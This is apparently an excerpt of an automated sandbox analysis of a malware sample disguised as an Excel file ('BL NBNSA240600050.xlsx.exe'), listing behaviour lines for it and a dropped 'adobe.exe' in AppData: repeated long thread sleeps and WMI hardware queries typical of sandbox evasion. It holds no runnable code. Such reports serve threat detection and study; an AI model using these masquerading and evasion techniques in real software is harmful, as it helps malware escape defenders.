Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -598500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -598336s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -597872s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -597765s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -597438s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -597188s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -596938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -596719s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -596375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -596266s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -596047s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -595938s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -595813s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -595594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -595016s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -594891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -594766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -594649s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -594546s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -594436s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7288	Thread sleep time: -594328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7464	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7464	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7464	Thread sleep time: -239843s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7464	Thread sleep time: -239733s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7464	Thread sleep time: -239625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7464	Thread sleep time: -239513s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7464	Thread sleep time: -239406s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7464	Thread sleep time: -239296s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7464	Thread sleep time: -239177s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7448	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7676	Thread sleep count: 1998 > 30
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -599889s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7676	Thread sleep count: 7819 > 30
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -599781s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -599672s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -599563s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -599438s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -599313s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -599188s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -599078s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -598969s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -598844s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -598735s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -598610s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -598485s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -598360s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -598235s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -598110s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -597985s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -597860s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -597735s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -597610s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -597485s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -597360s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -597235s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -597110s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -596985s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -596860s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -596735s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -596610s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -596485s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -596360s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -596235s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -596110s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -595985s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -595860s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -595735s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -595610s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -595485s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -595360s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -595235s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -595110s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -594985s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -594860s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -594735s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -594610s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -594485s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -594360s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -594235s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -594110s >= -30000s
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe TID: 7668	Thread sleep time: -593985s >= -30000s

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 239891	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 239770	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 239641	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 239531	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 239422	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 239313	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 239188	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 239063	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 238953	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 238844	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 238719	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 238587	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 238266	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 238157	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 238047	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 599859	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 599733	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 599625	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 599187	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 598515	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 598185	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 597844	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 597734	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 597625	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 597515	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 597297	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 596264	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 595315	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Users\user\Desktop\BL NBNSA240600050.xlsx.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239312	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239187	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239078	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599311	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598718	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598336	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597872	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597765	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596938	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595594	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594649	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594546	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594436	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239843	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239733	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239513	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239296	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 239177	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Thread delayed: delay time: 600000
